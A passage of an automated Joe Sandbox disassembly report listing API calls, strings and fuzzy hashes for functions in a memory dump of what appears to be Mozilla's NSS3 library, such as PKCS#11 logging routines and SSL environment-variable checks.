free.MOZGLUE(00000000), ref: 6CCE6DC5
free.MOZGLUE(?), ref: 6CCE6DD6
free.MOZGLUE(?), ref: 6CCE6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CCE6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CCE6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CCE6E72
free.MOZGLUE(?), ref: 6CCE6EA7
free.MOZGLUE(?), ref: 6CCE6EC4
free.MOZGLUE(?), ref: 6CCE6ED5
free.MOZGLUE(00000000), ref: 6CCE6EE3
free.MOZGLUE(?), ref: 6CCE6EF4
free.MOZGLUE(?), ref: 6CCE6F08
free.MOZGLUE(00000000), ref: 6CCE6F35
free.MOZGLUE(?), ref: 6CCE6F44
free.MOZGLUE(?), ref: 6CCE6F5B
free.MOZGLUE(00000000), ref: 6CCE6F65

Part of subcall function 6CCE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CCE781D,00000000,6CCDBE2C,?,6CCE6B1D,?,?,?,?,00000000,00000000,6CCE781D), ref: 6CCE6C40
Part of subcall function 6CCE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CCE781D,?,6CCDBE2C,?), ref: 6CCE6C58
Part of subcall function 6CCE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CCE781D), ref: 6CCE6C6F
Part of subcall function 6CCE6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CCE6C84
Part of subcall function 6CCE6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CCE6C96
Part of subcall function 6CCE6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CCE6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CCE6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CCE6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CCE6FF4

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 0c5cd9f75730c879c31bff247a4bc76750c3c4d6e6b79d81c11198551af79578
Instruction ID: f8fa2ab14d40e76ceec631bfe393af4f4b9a1dcdd98ce2cdebf2743474abe02c
Opcode Fuzzy Hash: 0c5cd9f75730c879c31bff247a4bc76750c3c4d6e6b79d81c11198551af79578
Instruction Fuzzy Hash: A6B161B1E1160D9FEF10DBA5D885B9E7BB8BF4A348F140024EA15E7A41F731E914CBA1

Function 6CCE4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CCE4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CCE4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4DB7

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907AD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907CD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907D6
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CC2204A), ref: 6CC907E4
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,6CC2204A), ref: 6CC90864
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CC90880
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,6CC2204A), ref: 6CC908CB
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908D7
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908FB

TlsGetValue.KERNEL32 ref: 6CCE4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CCE4DEC
PR_Unlock.NSS3(?), ref: 6CCE4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CCE4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CCE4E71
free.MOZGLUE(00000000), ref: 6CCE4E7A
PR_Unlock.NSS3(?), ref: 6CCE4EA2
TlsGetValue.KERNEL32 ref: 6CCE4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CCE4ED6
PR_Unlock.NSS3(?), ref: 6CCE4F01
free.MOZGLUE(00000000), ref: 6CCE4F2A

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 49f7e93a4a71708b2d87789c6f7e9c81620378eca21390b1ce86b530d9ed1637
Instruction ID: 3a18f648f0dd561305402d82b54653d562709f463485b4c59a33c437f6028055
Opcode Fuzzy Hash: 49f7e93a4a71708b2d87789c6f7e9c81620378eca21390b1ce86b530d9ed1637
Instruction Fuzzy Hash: 9AB11575E002059FEB00DFA8D884BAA77B8BF4A318F044129EE1597B11F735E965CBD1

Function 6CD36E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CD36BF7), ref: 6CD36EB6

Part of subcall function 6CC91240: TlsGetValue.KERNEL32(00000040,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC91267
Part of subcall function 6CC91240: EnterCriticalSection.KERNEL32(?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC9127C
Part of subcall function 6CC91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC91291
Part of subcall function 6CC91240: PR_Unlock.NSS3(?,?,?,?,6CC9116C,NSPR_LOG_MODULES), ref: 6CC912A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CDDFC0A,6CD36BF7), ref: 6CD36ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CD36EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CD36EFC
PR_NewLock.NSS3 ref: 6CD36F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CD36F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CD36BF7), ref: 6CD36F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CD36BF7), ref: 6CD36F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CD36BF7), ref: 6CD36FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CD36BF7), ref: 6CD36FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6CD36EF7
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CD36FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CD36F4F
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CD36FF8
SSLKEYLOGFILE, xrefs: 6CD36EB1
SSLFORCELOCKS, xrefs: 6CD36F2B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 28e119596477c4c2508a60803574aff8c47714a9057187255ed9bc6453517e8f
Instruction ID: eb5fcb87d5e5a35b3e7877aae355d52d47f918451b02e2e16fef5bb0773a726d
Opcode Fuzzy Hash: 28e119596477c4c2508a60803574aff8c47714a9057187255ed9bc6453517e8f
Instruction Fuzzy Hash: 2FA126B2B56CA0D7E6105B2CCD0174833F1BBA3369F1A5369E878CAEF5DB369450C291

Function 6CCD6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CCD6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD6DC3

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CCD6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CCD6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CCD6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CCD6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CCD6EB9

Strings

pDigest = 0x%p, xrefs: 6CCD6E27
pulDigestLen = 0x%p, xrefs: 6CCD6E42
hSession = 0x%x, xrefs: 6CCD6D9E, 6CCD6DAE
*pulDigestLen = 0x%x, xrefs: 6CCD6EB4
pData = 0x%p, xrefs: 6CCD6DF5
ulDataLen = %d, xrefs: 6CCD6E0E
(CK_INVALID_HANDLE), xrefs: 6CCD6DBC
C_Digest, xrefs: 6CCD6D81

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: b89f6eda73ab7372a2ce997d4c115b97fb043dc4d02c96fd371b41d093e24e17
Instruction ID: 7d3203affed0b07cfd6fe41cd08340d22ed61bad12cd701f3f43031e633bf4c6
Opcode Fuzzy Hash: b89f6eda73ab7372a2ce997d4c115b97fb043dc4d02c96fd371b41d093e24e17
Instruction Fuzzy Hash: FC41FD75701105AFEB00DF55DD48F4A3BB5EB5231DF094458E509A7A62EB31F818CBE2

Function 6CCF8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8E9E
PORT_ArenaAlloc_Util.NSS3(6CE00B64,00000001,?,?,?,?,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CCF8E01,00000000,6CCF9060,6CE00B64), ref: 6CCF8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CCF8E01), ref: 6CCF8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CE00B64,6CE00B64), ref: 6CCF8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CCF8F3F

Part of subcall function 6CCFA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CCFA421,00000000,00000000,6CCF9826), ref: 6CCFA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CCF904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CCF8E76

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 3dab490ea97eb3756c57baa0c28b0937bacdcb64e7112e3bcd6136174cf68b54
Instruction ID: 60b302fe9228936f6a6a0d8e2f17c2865fc422326a4332b2788586b061a34a6e
Opcode Fuzzy Hash: 3dab490ea97eb3756c57baa0c28b0937bacdcb64e7112e3bcd6136174cf68b54
Instruction Fuzzy Hash: 7F6181B5E001069BDF50CF56CC80AABB7B5FF89358F144128DC29A7B50E732A916CBB0

Function 6CCA8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCA8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CCA8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CCA8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CDD18D0,?), ref: 6CCA8F03
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCA8F19
PL_FreeArenaPool.NSS3(?), ref: 6CCA8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CCA8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCA8F65
PL_FinishArenaPool.NSS3(?), ref: 6CCA8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CCA8FFE
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCA9012
PL_FreeArenaPool.NSS3(?), ref: 6CCA9024
PL_FinishArenaPool.NSS3(?), ref: 6CCA902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CCA903E

Strings

security, xrefs: 6CCA8EE7

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: cfa724db6e443044268518c01699848b131a26ca3f26a9b58140ab35f21942ca
Instruction ID: be33cd0efef6431d375acf920c3154860fa28303d81035cb566ae59947079fc2
Opcode Fuzzy Hash: cfa724db6e443044268518c01699848b131a26ca3f26a9b58140ab35f21942ca
Instruction Fuzzy Hash: 15515DB5608241ABD7109F999C45FAB73E8AF8975CF04042EF95497B90F731D80AC763

Function 6CCD4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CCD4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD4EC7

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CCD4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CCD4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CCD4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CCD4F68

Strings

hSession = 0x%x, xrefs: 6CCD4EA2, 6CCD4EB2
hObject = 0x%x, xrefs: 6CCD4EF5, 6CCD4F05
pTemplate = 0x%p, xrefs: 6CCD4F4A
C_GetAttributeValue, xrefs: 6CCD4E7E
(CK_INVALID_HANDLE), xrefs: 6CCD4EC0, 6CCD4F13
ulCount = %d, xrefs: 6CCD4F63

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 2074277eb708fa34e134a5ad56bb417b547573c0ee95d444646e52c8a6d2aefc
Instruction ID: eb2768b3f548d4e5f06d79c4a09cfc2b0c849e418439b53c577f9949abbafaef
Opcode Fuzzy Hash: 2074277eb708fa34e134a5ad56bb417b547573c0ee95d444646e52c8a6d2aefc
Instruction Fuzzy Hash: 78410571701105BFEB00DF54DD48F9A77B5EB5230DF094028E6096BA62EB35E918CBE2

Function 6CCD4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CCD4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD4D37

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CCD4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CCD4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CCD4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CCD4E20

Strings

hSession = 0x%x, xrefs: 6CCD4D12, 6CCD4D22
hObject = 0x%x, xrefs: 6CCD4D65, 6CCD4D75
*pulSize = 0x%x, xrefs: 6CCD4E1B
C_GetObjectSize, xrefs: 6CCD4CEE
pulSize = 0x%p, xrefs: 6CCD4DB7
(CK_INVALID_HANDLE), xrefs: 6CCD4D30, 6CCD4D83

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 15526fd3ddcc75ae4d8260691213db707a0c7f9f393a44c91bf3245ce09224f1
Instruction ID: 7d13c9eddf0fbac9c6ded3a86fea4fae642f24cbd5e90e918acbc19cbc44073a
Opcode Fuzzy Hash: 15526fd3ddcc75ae4d8260691213db707a0c7f9f393a44c91bf3245ce09224f1
Instruction Fuzzy Hash: C541C6B1701104BFEB00DF54DD88B5A37B5EB5230DF094069E7096BA62EB31E95CCBA2

Function 6CCD2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6CCD2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD2F63

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CCD2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CCD2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CCD2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CCD2FE7

Strings

hSession = 0x%x, xrefs: 6CCD2F3E, 6CCD2F4E
ulOldLen = %d, xrefs: 6CCD2FB0
C_SetPIN, xrefs: 6CCD2F21
pNewPin = 0x%p, xrefs: 6CCD2FC9
ulNewLen = %d, xrefs: 6CCD2FE2
pOldPin = 0x%p, xrefs: 6CCD2F95
(CK_INVALID_HANDLE), xrefs: 6CCD2F5C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: e67987df415cf150f1d28ab0ef99e58972830be429cca9f8646e0bbae641e7cb
Instruction ID: 0ee2433cf9d2d48d7cc5035f2051c978bf38c220ffe33143e6859db6cbd05d7a
Opcode Fuzzy Hash: e67987df415cf150f1d28ab0ef99e58972830be429cca9f8646e0bbae641e7cb
Instruction Fuzzy Hash: 803126B2B01155AFEB00DF54DD4CE4A7BB1EB4631DF094458E509A7622EB31EC58CBE2

Function 6CD6CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CD6CC7B), ref: 6CD6CD7A

Part of subcall function 6CD6CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CCDC1A8,?), ref: 6CD6CE92

